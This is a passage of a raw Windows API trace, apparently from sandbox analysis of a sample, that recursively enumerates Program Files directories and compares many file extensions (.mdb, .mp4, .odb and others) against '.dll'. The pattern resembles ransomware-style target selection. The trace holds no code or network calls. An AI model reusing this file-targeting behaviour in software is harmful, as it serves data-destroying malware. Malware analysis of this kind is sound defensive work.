lstrcmpiW (lpString1=".max", lpString2=".dll") returned 1 [0035.483] lstrlenW (lpString=".md") returned 3 [0035.483] lstrcmpiW (lpString1=".md", lpString2="dll") returned -1 [0035.483] lstrlenW (lpString=".mda") returned 4 [0035.483] lstrcmpiW (lpString1=".mda", lpString2=".dll") returned 1 [0035.483] lstrlenW (lpString=".mdb") returned 4 [0035.483] lstrcmpiW (lpString1=".mdb", lpString2=".dll") returned 1 [0035.483] lstrlenW (lpString=".mde") returned 4 [0035.483] lstrcmpiW (lpString1=".mde", lpString2=".dll") returned 1 [0035.483] lstrlenW (lpString=".mdf") returned 4 [0035.483] lstrcmpiW (lpString1=".mdf", lpString2=".dll") returned 1 [0035.483] lstrlenW (lpString=".mdw") returned 4 [0035.483] lstrcmpiW (lpString1=".mdw", lpString2=".dll") returned 1 [0035.483] lstrlenW (lpString=".mef") returned 4 [0035.483] lstrcmpiW (lpString1=".mef", lpString2=".dll") returned 1 [0035.483] lstrlenW (lpString=".mft") returned 4 [0035.483] lstrcmpiW (lpString1=".mft", lpString2=".dll") returned 1 [0035.483] lstrlenW (lpString=".mfw") returned 4 [0035.483] lstrcmpiW (lpString1=".mfw", lpString2=".dll") returned 1 [0035.483] lstrlenW (lpString=".mht") returned 4 [0035.483] lstrcmpiW (lpString1=".mht", lpString2=".dll") returned 1 [0035.484] lstrlenW (lpString=".mhtml") returned 6 [0035.484] lstrcmpiW (lpString1=".mhtml", lpString2="NU.dll") returned -1 [0035.484] lstrlenW (lpString=".mka") returned 4 [0035.484] lstrcmpiW (lpString1=".mka", lpString2=".dll") returned 1 [0035.484] lstrlenW (lpString=".mkidx") returned 6 [0035.484] lstrcmpiW (lpString1=".mkidx", lpString2="NU.dll") returned -1 [0035.484] lstrlenW (lpString=".mkv") returned 4 [0035.484] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0035.484] lstrlenW (lpString=".mos") returned 4 [0035.484] lstrcmpiW (lpString1=".mos", lpString2=".dll") returned 1 [0035.484] lstrlenW (lpString=".mov") returned 4 [0035.484] lstrcmpiW (lpString1=".mov", lpString2=".dll") returned 1 [0035.484] lstrlenW (lpString=".mp3") returned 4 [0035.484] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0035.484] lstrlenW (lpString=".mp4") returned 4 [0035.484] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0035.484] lstrlenW (lpString=".mpeg") returned 5 [0035.484] lstrcmpiW (lpString1=".mpeg", lpString2="U.dll") returned -1 [0035.484] lstrlenW (lpString=".mpg") returned 4 [0035.484] lstrcmpiW (lpString1=".mpg", lpString2=".dll") returned 1 [0035.484] lstrlenW (lpString=".mpv") returned 4 [0035.484] lstrcmpiW (lpString1=".mpv", lpString2=".dll") returned 1 [0035.484] lstrlenW (lpString=".mrw") returned 4 [0035.484] lstrcmpiW (lpString1=".mrw", lpString2=".dll") returned 1 [0035.484] lstrlenW (lpString=".msg") returned 4 [0035.484] lstrcmpiW (lpString1=".msg", lpString2=".dll") returned 1 [0035.484] lstrlenW (lpString=".mxl") returned 4 [0035.484] lstrcmpiW (lpString1=".mxl", lpString2=".dll") returned 1 [0035.484] lstrlenW (lpString=".myd") returned 4 [0035.484] lstrcmpiW (lpString1=".myd", lpString2=".dll") returned 1 [0035.484] lstrlenW (lpString=".myi") returned 4 [0035.484] lstrcmpiW (lpString1=".myi", lpString2=".dll") returned 1 [0035.484] lstrlenW (lpString=".nef") returned 4 [0035.484] lstrcmpiW (lpString1=".nef", lpString2=".dll") returned 1 [0035.484] lstrlenW (lpString=".nrw") returned 4 [0035.484] lstrcmpiW (lpString1=".nrw", lpString2=".dll") returned 1 [0035.485] lstrlenW (lpString=".obj") returned 4 [0035.485] lstrcmpiW (lpString1=".obj", lpString2=".dll") returned 1 [0035.485] lstrlenW (lpString=".odb") returned 4 [0035.485] lstrcmpiW (lpString1=".odb", lpString2=".dll") returned 1 [0035.485] lstrlenW (lpString=".odc") returned 4 [0035.485] lstrcmpiW (lpString1=".odc", lpString2=".dll") returned 1 [0035.485] lstrlenW (lpString=".odm") returned 4 [0035.485] lstrcmpiW (lpString1=".odm", lpString2=".dll") returned 1 [0035.485] lstrlenW (lpString=".odp") returned 4 [0035.485] lstrcmpiW (lpString1=".odp", lpString2=".dll") returned 1 [0035.485] lstrlenW (lpString=".ods") returned 4 [0035.485] lstrcmpiW (lpString1=".ods", lpString2=".dll") returned 1 [0035.485] FindClose (in: hFindFile=0x3ef1300 | out: hFindFile=0x3ef1300) returned 1 [0035.485] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fda4f0 | out: hHeap=0x570000) returned 1 [0035.485] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc536f5be, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc536f5be, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x36fbb600, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xa200, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSTTSCommon.dll", cAlternateFileName="")) returned 1 [0035.485] FindClose (in: hFindFile=0x3ef1240 | out: hFindFile=0x3ef1240) returned 1 [0035.485] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3ee0058 | out: hHeap=0x570000) returned 1 [0035.485] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TTS20", cAlternateFileName="")) returned 0 [0035.485] FindClose (in: hFindFile=0x3ef1280 | out: hFindFile=0x3ef1280) returned 1 [0035.485] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3ed0050 | out: hHeap=0x570000) returned 1 [0035.486] FindNextFileW (in: hFindFile=0x3ef1140, lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0035.486] FindClose (in: hFindFile=0x3ef1140 | out: hFindFile=0x3ef1140) returned 1 [0035.486] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39206d0 | out: hHeap=0x570000) returned 1 [0035.487] FindNextFileW (in: hFindFile=0x3ef1100, lpFindFileData=0x353f808 | out: lpFindFileData=0x353f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0035.487] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\*", lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1140 [0035.852] FindNextFileW (in: hFindFile=0x3ef1140, lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.852] FindNextFileW (in: hFindFile=0x3ef1140, lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ado", cAlternateFileName="")) returned 1 [0035.853] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\ado\\*", lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1280 [0035.853] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.853] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4c91ed4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0xa4c91ed4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0xa06f97f7, ftLastWriteTime.dwHighDateTime=0x1ca03fb, nFileSizeHigh=0x0, nFileSizeLow=0x3912, dwReserved0=0x0, dwReserved1=0x0, cFileName="adojavas.inc", cAlternateFileName="")) returned 1 [0035.853] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\ado\\en-US\\*", lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1240 [0035.853] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.853] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a152a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2a152a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x0, dwReserved1=0x0, cFileName="msader15.dll.mui", cAlternateFileName="")) returned 1 [0035.853] FindClose (in: hFindFile=0x3ef1240 | out: hFindFile=0x3ef1240) returned 1 [0035.854] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3ee0058 | out: hHeap=0x570000) returned 1 [0035.854] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6129cc5, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0x6129cc5, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x80fe7780, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msader15.dll", cAlternateFileName="")) returned 1 [0035.854] FindClose (in: hFindFile=0x3ef1280 | out: hFindFile=0x3ef1280) returned 1 [0035.854] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3ed0050 | out: hHeap=0x570000) returned 1 [0035.854] FindNextFileW (in: hFindFile=0x3ef1140, lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf4f1c09, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xbf4f1c09, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x128ffb00, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x7200, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectDB.dll", cAlternateFileName="")) returned 1 [0035.854] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\en-US\\*", lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1280 [0035.854] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.854] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb313d55, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb313d55, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x16e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="wab32res.dll.mui", cAlternateFileName="")) returned 1 [0035.855] FindClose (in: hFindFile=0x3ef1280 | out: hFindFile=0x3ef1280) returned 1 [0035.855] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3ed0050 | out: hHeap=0x570000) returned 1 [0035.855] FindNextFileW (in: hFindFile=0x3ef1140, lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadc", cAlternateFileName="")) returned 1 [0035.855] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\*", lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1280 [0035.855] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.855] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34c44b4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0xa34c44b4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0xa05a2bb2, ftLastWriteTime.dwHighDateTime=0x1ca03fb, nFileSizeHigh=0x0, nFileSizeLow=0x276, dwReserved0=0x0, dwReserved1=0x0, cFileName="adcjavas.inc", cAlternateFileName="")) returned 1 [0035.855] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1240 [0035.856] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.856] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9351968, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x95b44f8, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x9351968, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadcer.dll.mui", cAlternateFileName="")) returned 1 [0035.856] FindClose (in: hFindFile=0x3ef1240 | out: hFindFile=0x3ef1240) returned 1 [0035.857] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3ee0058 | out: hHeap=0x570000) returned 1 [0035.857] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cac9e93, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0x2cac9e93, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0x2cac9e93, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x206, dwReserved0=0x0, dwReserved1=0x0, cFileName="handler.reg", cAlternateFileName="")) returned 1 [0035.858] RtlReAllocateHeap (Heap=0x570000, Flags=0x0, Ptr=0x3fca4e8, Size=0x20000) returned 0x3fca4e8 [0035.858] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d95dfd, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x99d95dfd, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x99dbbf5d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdfmap.dll", cAlternateFileName="")) returned 0 [0035.858] FindClose (in: hFindFile=0x3ef1280 | out: hFindFile=0x3ef1280) returned 1 [0035.858] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3ed0050 | out: hHeap=0x570000) returned 1 [0035.858] FindNextFileW (in: hFindFile=0x3ef1140, lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSMAPI", cAlternateFileName="")) returned 1 [0035.859] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\MSMAPI\\*", lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1280 [0035.859] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.859] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0035.859] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\*", lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ef1240 [0035.859] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.859] FindNextFileW (in: hFindFile=0x3ef1240, lpFindFileData=0x353f094 | out: lpFindFileData=0x353f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x324d2e00, ftCreationTime.dwHighDateTime=0x1caca25, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x324d2e00, ftLastWriteTime.dwHighDateTime=0x1caca25, nFileSizeHigh=0x0, nFileSizeLow=0xe580, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSMAPI32.DLL", cAlternateFileName="")) returned 1 [0035.859] FindClose (in: hFindFile=0x3ef1240 | out: hFindFile=0x3ef1240) returned 1 [0035.859] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3ed0050 | out: hHeap=0x570000) returned 1 [0035.859] FindNextFileW (in: hFindFile=0x3ef1280, lpFindFileData=0x353f310 | out: lpFindFileData=0x353f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53e90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0035.860] FindClose (in: hFindFile=0x3ef1280 | out: hFindFile=0x3ef1280) returned 1 [0035.860] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3fea4f0 | out: hHeap=0x570000) returned 1 [0035.860] FindNextFileW (in: hFindFile=0x3ef1140, lpFindFileData=0x353f58c | out: lpFindFileData=0x353f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5f324e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f324e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ole DB", cAlternateFileName="OLEDB~1")) returned 1 [0035.860] FindFirstFileW (in: 